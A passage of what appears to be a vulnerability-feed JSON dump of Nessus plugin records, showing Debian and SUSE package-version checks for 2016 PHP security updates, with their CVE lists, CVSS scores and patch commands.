(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libphp5-embed\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php-pear\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cgi\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cli\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-common\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-curl\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dbg\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dev\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-enchant\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-fpm\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gd\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gmp\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-imap\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-interbase\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-intl\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-ldap\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mcrypt\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysql\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysqlnd\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-odbc\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pgsql\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-phpdbg\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pspell\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-readline\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-recode\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-snmp\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sqlite\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sybase\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-tidy\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xmlrpc\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xsl\", reference:\"5.6.26+dfsg-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:37", "description": "This update for php53 fixes the following security issues :\n\n - CVE-2016-7124: Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization\n\n - CVE-2016-7125: PHP Session Data Injection Vulnerability\n\n - CVE-2016-7126: select_colors write out-of-bounds\n\n - CVE-2016-7127: imagegammacorrect allowed arbitrary write access\n\n - CVE-2016-7128: Memory Leakage In exif_process_IFD_in_TIFF\n\n - CVE-2016-7129: wddx_deserialize allows illegal memory access\n\n - CVE-2016-7130: wddx_deserialize null dereference\n\n - CVE-2016-7131: wddx_deserialize null dereference with invalid xml\n\n - CVE-2016-7132: wddx_deserialize null dereference in php_wddx_pop_element\n\n - CVE-2016-7411: php5: Memory corruption when destructing deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-10-06T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2016:2459-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-2459-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2459-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93894);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2016:2459-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 fixes the following security issues :\n\n - CVE-2016-7124: Create an Unexpected Object and Don't\n Invoke __wakeup() in Deserialization\n\n - CVE-2016-7125: PHP Session Data Injection Vulnerability\n\n - CVE-2016-7126: select_colors write out-of-bounds\n\n - CVE-2016-7127: imagegammacorrect allowed arbitrary write\n access\n\n - CVE-2016-7128: Memory Leakage In\n exif_process_IFD_in_TIFF\n\n - CVE-2016-7129: wddx_deserialize allows illegal memory\n access\n\n - CVE-2016-7130: wddx_deserialize null dereference\n\n - CVE-2016-7131: wddx_deserialize null dereference with\n invalid xml\n\n - CVE-2016-7132: wddx_deserialize null dereference in\n php_wddx_pop_element\n\n - CVE-2016-7411: php5: Memory corruption when destructing\n deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=997257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7124/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7126/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7130/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7132/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7411/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7413/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7414/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7416/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7417/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7418/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162459-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?576fb75e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-php53-12775=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-php53-12775=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-php53-12775=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-php53-12775=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-php53-12775=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-php53-12775=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-php53-12775=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-php53-12775=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-php53-12775=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"apache2-mod_php53-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bcmath-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bz2-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-calendar-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ctype-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-curl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dba-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dom-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-exif-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fastcgi-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fileinfo-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ftp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gd-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gettext-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gmp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-iconv-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-intl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-json-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ldap-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mbstring-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mcrypt-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mysql-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-odbc-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-openssl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pcntl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pdo-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pear-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pgsql-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pspell-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-shmop-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-snmp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-soap-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-suhosin-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvmsg-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvsem-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvshm-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-tokenizer-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-wddx-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlreader-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlrpc-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlwriter-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xsl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zip-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zlib-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"apache2-mod_php53-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bcmath-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bz2-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-calendar-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ctype-5.3.17-84.1\")) flag++;\nif 